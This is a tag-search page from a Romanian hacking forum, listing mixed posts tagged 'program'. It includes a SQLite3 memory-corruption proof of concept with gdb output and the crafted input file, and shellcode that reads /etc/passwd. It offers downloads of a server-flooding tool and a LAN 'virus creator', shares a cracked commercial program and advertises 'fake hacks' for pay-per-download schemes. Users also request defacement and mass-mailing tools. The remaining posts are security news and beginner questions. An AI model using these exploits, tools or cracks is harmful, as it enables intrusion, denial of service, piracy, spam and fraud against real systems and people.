Jump to content

Search the Community

Showing results for tags 'program'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. HL -PROGRAM V2.6 FLOOD SERVER AND DOWN !!! SCREN: // Warning: Downloadati doar pentru analiza malware D O W N L O A D: HL -PROGRAM v2.6 [FLOOD SERVER AND DOWN].rar — RGhost — file sharing FileShare Download HL -PROGRAM v2.6 [FLOOD SERVER AND DOWN].rar Zippyshare.com - HL -PROGRAM v2.6 [FLOOD SERVER AND DOWN].rar
  2. # Exploit Title: SQLite3 controlled memory corruption PoC (0day) # Date: [date] # Exploit Author: Andras Kabai # Vendor Homepage: http://www.sqlite.org/ # Software Link: http://www.sqlite.org/download.html # Version: 3.8.6, 3.8.8.3 # Tested on: Ubuntu 14.10, 64 bit 3.8.6 (latest available package), 3.8.8.3 (built from the latest source code) Using a crafted input (e.g. from a malicious file via “-init” parameter or directly given to the std input of the program) it is possible to trigger a memory corruption vulnerability in the most recent version of SQLite3. The memory corruption could be controlled, therefore the program flow could be manipulated by the attacker. The following sections demonstrates the attack against the apt-get installed installed and updated sqlite3 and against a newer version that is built from source. ==== andrew@ubufuzzx6401:~/issues/sqlite$ which sqlite3 /usr/bin/sqlite3 andrew@ubufuzzx6401:~/issues/sqlite$ /usr/bin/sqlite3 -version 3.8.6 2014-08-15 11:46:33 9491ba7d738528f168657adb43a198238abde19e andrew@ubufuzzx6401:~/issues/sqlite$ gdb64 /usr/bin/sqlite3 GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs Copyright (C) 2014 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from /usr/bin/sqlite3...(no debugging symbols found)...done. (gdb) set disassembly-flavor intel (gdb) set args < sqlitepoc.txt (gdb) r Starting program: /usr/bin/sqlite3 < sqlitepoc.txt warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch). [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Usage: .trace FILE|off Error: near line 4: near "whatever": syntax error Usage: .trace FILE|off Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7ba06a0 in sqlite3_load_extension () from /usr/lib/x86_64-linux-gnu/libsqlite3.so.0 (gdb) i r rax 0x138 312 rbx 0x41414141424242 18367622009733698 rcx 0x7fffffffb590 140737488336272 rdx 0x0 0 rsi 0x555555779b43 93824994483011 rdi 0x41414141424242 18367622009733698 rbp 0x555555779b43 0x555555779b43 rsp 0x7fffffffb4c0 0x7fffffffb4c0 r8 0x555555779b41 93824994483009 r9 0x6c 108 r10 0x0 0 r11 0x0 0 r12 0x555555779b48 93824994483016 r13 0x7fffffffb590 140737488336272 r14 0x555555779b40 93824994483008 r15 0x2 2 rip 0x7ffff7ba06a0 0x7ffff7ba06a0 <sqlite3_load_extension+736> eflags 0x10246 [ PF ZF IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) disas $rip,+10 Dump of assembler code from 0x7ffff7ba06a0 to 0x7ffff7ba06aa: => 0x00007ffff7ba06a0 <sqlite3_load_extension+736>: call QWORD PTR [rbx+0x48] 0x00007ffff7ba06a3 <sqlite3_load_extension+739>: mov r15,rax 0x00007ffff7ba06a6 <sqlite3_load_extension+742>: lea rax,[rip+0x12bc1] # 0x7ffff7bb326e End of assembler dump. === andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ ./lt-sqlite3 -version 3.8.8.3 2015-02-25 13:29:11 9d6c1880fb75660bbabd693175579529785f8a6b andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ gdb64 ./lt-sqlite3 GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs Copyright (C) 2014 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from ./lt-sqlite3...done. (gdb) set disassembly-flavor intel (gdb) set args < /home/andrew/issues/sqlite/sqlitepoc.txt (gdb) r Starting program: /home/andrew/tmp/build/sqlite-autoconf-3080803/.libs/lt-sqlite3 < /home/andrew/issues/sqlite/sqlitepoc.txt warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch). [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Usage: .trace FILE|off Error: near line 4: near "whatever": syntax error Usage: .trace FILE|off Program received signal SIGSEGV, Segmentation fault. sqlite3LoadExtension (pzErrMsg=0x7fffffffb510, zProc=0x0, zFile=0x6261c3 "CCCCBBBBAAAA", db=0x6261c8) at sqlite3.c:36169 36169 } (gdb) i r rax 0x138 312 rbx 0x41414141424242 18367622009733698 rcx 0x7fffffffb510 140737488336144 rdx 0x0 0 rsi 0x6261c3 6447555 rdi 0x41414141424242 18367622009733698 rbp 0x6261c3 0x6261c3 rsp 0x7fffffffb440 0x7fffffffb440 r8 0x6261c1 6447553 r9 0x6c 108 r10 0x7fffffffb270 140737488335472 r11 0x7ffff7b5ae50 140737349267024 r12 0x6261c8 6447560 r13 0x7fffffffb510 140737488336144 r14 0x6261c0 6447552 r15 0x2 2 rip 0x7ffff7b5b130 0x7ffff7b5b130 <sqlite3_load_extension+736> eflags 0x10246 [ PF ZF IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) disas $rip,+10 Dump of assembler code from 0x7ffff7b5b130 to 0x7ffff7b5b13a: => 0x00007ffff7b5b130 <sqlite3_load_extension+736>: call QWORD PTR [rbx+0x48] 0x00007ffff7b5b133 <sqlite3_load_extension+739>: mov r15,rax 0x00007ffff7b5b136 <sqlite3_load_extension+742>: lea rax,[rip+0x587d8] # 0x7ffff7bb3915 End of assembler dump. ==== andrew@ubufuzzx6401:~/issues/sqlite$ hexdump -C sqlitepoc.txt 00000000 3b 0a 2e 74 20 78 0a 2e 74 0a 77 68 61 74 65 76 |;..t x..t.whatev| 00000010 65 72 00 0a 3b 0a 2e 74 0a 2e 6f 70 0a 2e 6c 20 |er..;..t..op..l | 00000020 43 43 43 43 42 42 42 42 41 41 41 41 0a |CCCCBBBBAAAA.| 0000002d Source
  3. Adobe has launched a bug bounty program that hands out high-fives, not cash. The web application vulnerability disclosure program announced today and launched last month operates through HackerOne used by the likes of Twitter, Yahoo!, and CloudFlare, some of which provide cash or other rewards to those who disclose security messes. Adobe's program seeks out common flaws in its online services, including cross-site scripting; privileged cross-site request forgery; server-side code execution; authentication or authorisation flaws; injection vulnerabilities; directory traversal; information disclosure, and significant security misconfiguration. "In recognition of the important role that independent security researchers play in keeping Adobe customers safe, today Adobe launches a web application vulnerability disclosure program on the HackerOne platform," wrote Adobe security program manager Pieters Ockers. "Bug hunters who identify a web application vulnerability in an Adobe online service or web property can now privately disclose the issue to Adobe while boosting their HackerOne reputation score." Hackers will need to be the first in for reporting a flaw and offer Adobe "reasonable" time to fix the flaws prior to public disclosure, Ockers says. Smaller vulnerabilities such as the following are excluded: Logout and other instances of low-severity cross-site request forgery Perceived issues with password reset links Missing http security headers Missing cookie flags on non-sensitive cookies Clickjacking on static pages The announcement comes as AirBnB this week launched its bug bounty on the popular HackerOne platform. Bug bounties work best when they offer cash, according to BugCrowd engineer Drew Sing. In vulnerability program guidelines published July he says money is the best incentive to encourage researchers to conduct more regular and intense testing of products and services. "A high priority security issue handled improperly could damage the reputation of the organisation ... the development, IT and communications team are all critical components to a successful program," Sing says. The managed bug service recommends bounties should be published in an obvious location on websites, preferably located with the /security subdomain, and sport a dedicated security contact who is well-briefed in handling disclosures. So why has Adobe decided street cred, not cash, is the way to go? Wags might wonder if the company's infamously-porous products have so many bugs that a cash bounty could dent the bottom line. Source
  4. The law that the Obama administration cites to allow bulk telephone metadata collection expires on June 1, and the FBI has already begun lobbying to keep Section 215 of the Patriot Act from expiring. Bad guys "going dark" using encryption, the FBI says, is one of the reasons why the government needs to collect the metadata of every phone call made to and from the United States. Robert Anderson, the FBI’s chief of the Criminal, Cyber, Response, and Services Branch, told reporters during a roundtable discussion Tuesday that the Patriot Act is necessary because encrypted communications are becoming more commonplace in the wake of the Edward Snowden disclosures. "In the last two to three years, that whole ‘going dark’ thing went from a crawl to a flat-out sprint because the technology is changing so rapidly," Anderson said. Joseph Demarest, assistant director of the FBI's Cyber Division, told reporters that if Section 215 expires, "Obviously it’s going to impact what we do as an organization and certainly on cyber." The comments, especially as they relate to encryption, are part of a growing chorus of calls—from as high as President Barack Obama—that the government needs Silicon Valley's assistance for backdoors into encrypted tech products like the iPhone. Silicon Valley has (at least publicly) shunned the administration's attempts to get backdoors into their products. And while no legislation at the moment requires them to comply, the nation's spy apparatus and others are turning their attention toward not losing the bulk telephone metadata spying program that spun heads when The Guardian—armed with classified documents from Snowden—exposed it in 2013. As it turns out, the secret Foreign Intelligence Surveillance Act court that was authorizing the program was doing so under the authority of Section 215 of the Patriot Act. While many leading lawmakers are behind renewing the program, there are plenty of reasons why it should expire come June. According to the EFF: One federal judge has upheld the program while another has declared it unconstitutional. A Supreme Court showdown over the snooping isn't likely to happen any time soon. There's plenty of rhetoric on all sides of the issue, too. Sen. Marco Rubio (R-FL) said Section 215 should never expire. House Speaker John Boehner (R-Ohio) and Majority Leader Mitch McConnell (R-KY) are big fans of Section 215. Sens. Ron Wyden (D-OR) and Martin Heinrich (D-NM) said that "none of the claims appear to hold up to scrutiny" that the bulk metadata collection program prevents terrorism. When Congress publicly re-authorized Section 215 three years ago, the public didn't know that lawmakers were secretly approving the bulk telephone metadata program. And some lawmakers who had voted for re-authorization claimed that they didn't even know about the bulk collection program. At least this time, when it comes up for a vote in the coming months, lawmakers can't claim that they didn't know they were voting to allow the government to scoop up data that includes phone numbers of parties involved in calls, calling card numbers, the time and duration of the calls, and the international mobile subscriber identity number for mobile callers. The database is said to have more than 1 trillion records. Source
  5. At last week’s Security Analyst Summit, HackerOne’s Katie Moussouris explains one of the key things that companies that want to start a bounty or vulnerability incentive program should know: There is no one size fits all. Source
  6. Buna ziua revin cu aceasta intrebare daca ma poate ajuta cineva sa imi creeze acest program sau daca il are ofer la schimb metode de traffic cu nise fierbinti il ajut sa isi faca cont pe afiliate survey sau daca aveti cont de adsense va arat ce nise merg la ora actuala lasatimi un pm daca ma puteti ajuta cu contu de skype sau mess sau ce aveti ca sa discutam mai multe. Cu respect.
  7. Salut Sunt un impatimit al it-ului! Acum cateva luni(3-4 luni) am facut un program foarte simplu .bat in care apasam 1 se deschidea chrome etc si tot asa Acum as dori sa fac un program Care sa aibe asa I tab sus Browse Alt tab Jocuri sa pun click pe browse sa se deschida o ferseastra si sa fie mozila chrome cand dau click pe mozilla sa se deschida mozila si asa si la jocuri Ma poate ajuta cineva? Adica gen in ce program sa fac designul si sa pot face si codurile ?? Multumesc anticipat:)
  8. Avantaje pentru cei care se inregistreaza la mine: * Pentru inceput va ajut sa intelegeti metoda youtube. * Sau torrente in functie de ce se potriveste mai bine fiecarei persoane *Iar cei care au potential vor avea parte de mai mult suport din partea mea persoanele care isi dau interesul vor primii si alte nise mai profitabile Am 3 programe din care va trebuii sa va alegeti unul singur sa lucrati pe el: Program 1: -80% Reffback -Support Mess -Plata Net20 Program 2: -40%reffback -Support Mess -Plata Net10 -Ajutor in cautarea niselor + promovarea lor Program 3: - No reffback -Support Mess/Skype -Support TeamViewer -Ajutor in cautarea niselor + promovarea lor -Site pe care sa va promovati nisele -Va fac eu Hackuri Fake daca stiti sa faceti videouri bune -Conturi youtube Free in functie de cat produceti -Plata INSTANT Minimul de plata: 2$ Metode de plata: PayPal, Perfect Money, Transfer Orange In functie de cati bani faceti in prima luna va pot oferi conturi youtube gratis (nu sute) Pe dreamcash accept doar persoane care stiu cu ce se mananca ppd Link reff: IL DAU PRIN PM Contact: YM: just_fly_2010@yahoo.com Skype: Koko XD / koko.mast3r
  9. VideoMakerFX e un program de faci videclipuri de promovare la diferite câcaturi. Exemplu: Pentru ca javrele cer prea mult, i-am sters login-ul din script si il postez aici. 1.Descarcati asta: https://mega.co.nz/#!4Fki3LbD!gTYYAcMtFcJ57jsy1YU8_ft33vLtm2XSZbshFyvLMpo 2.Descarcati si asta: https://mega.co.nz/#!oIFgGDgY!6rvi6JTKOoI0yi38miTkdtDKwC5JHby-ljO1MRwTI5E 3.Instalati VideoMakerFX 4.Copiati ce e la punctul 2 unde ati instalat program and done!
  10. Ma poate ajuta si pe mine cineva cu un root bun de scann, s-au cu un program sa prin un root bun? [Multumesc Anticipat! ]
  11. Bun? ziua a? dori ?i eu un program de spart o comunitate de preferat deface! M-am s?turat de to?i hakerii plii mele sa imi tot fut? com. va rog sa ma puteti ajuta. Din câte am in?eles pute?i da deface fara VPS sau vds ori dedicate plm....sper s? m? ajutat!!
  12. 1. Simple program that reads /etc/passwd file Shellcode: ( Download Link given in the end ) "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\ x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x 2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x8 0" Now we create a simple programt that will execute this code and Compile it using gcc –fno-stack-protector -z execstack code.c –o shellcode It will compile our code and program should work without any hindrance. Read more: http://dl.packetstormsecurity.net/papers/shellcode/re_shellcode.pdf
  13. In this article we will get an introduction into mobile malware on Android. The main goal is to give you an overview of the tools used and provide you with a starting point for next work.We will use some webservices that provide a good overview of the malware and later specialized tools to understand the details. This sample is a example malware(syssecApp.apk) written for Reverse Engineering Summer School 2013 (Organized by Ruhr University-Bochum). It provides an overview of what Android malware is able to do. It is not linked to a control server, so the data it steals will never leave our phone. However some personal data will be visible in the logs and during our analysis, so we should use an emulator anyway. Basically; 1 – Basics of Android Applications Read more: http://dl.packetstormsecurity.net/papers/attack/intro-android-malware.pdf
  14. Salut. Am si eu un iPhone 4, IOS 7.1.2 si am nevoie sa il pun ca webcam pentru un site (am nevoie sa fiu vazut si la fata). Aveam incercat inainte pe samsung galaxy s2 si cu el am reusit cu nu stiu ce minune de program. Cu iPhone se poate? Am nevoie ca nu am webcam bun si calitatea imaginii e incomparabil mai buna pe telefon.
  15. In acest program vezi putea gasi modalitati pentru creearea propriului vostru virus. *Functioneaza 100% pe Windows XP! Nu l-am testat pentru celelalte Sisteme de Operare! Acest program contine: -Remote Desktop care poate fi utilizat pe LAN (sincer l-am utilizat la scoala pe lan si a functionat la fel si cu celelalte aplicatii care o sa vi le spun mai jos), -LAN Mass Mesage (trimite mesaje unui PC de pe lan aflandu-i inclusiv username pentru a putea trimite mesaj sau trimite mesaj la toate calculatoarele de pe lan. Necesita drepturi de administrator!) -Shutdown pe IP (Aceasta comanda iti da posibilitatea in a da shutdown oricarui calculator de pe lan sau tuturor calculatoarelor de pe lan. si aceasta optiune necesita drepturi de administrator.) Nu va mai dau multe informatii despre program deoarece vreau sa le descoperiti singuri. Acest program este un program BETA! La fiecare versiune mai noua a acestui program voi face un topic nou Programu il puteti descarca de aici: Download Bat Virus Creator v 2.6.3.exe Download Bat Virus Creator v 2.6.3.exe - FisierulMeu.ro
  16. Tocmai am scris un cod pentru un program in python. Cum il pot executa ca un program normal (.exe)? P.S. Sa poate fi salvat .exe adica pur si simplu sa dau click pe el si sa se deschida programul.
  17. Salut . Vreau si eu sa trimit cateva mii de mailuri . Cu ce program pot face asta ? Unul gratuit daca stiti .
×
×
  • Create New...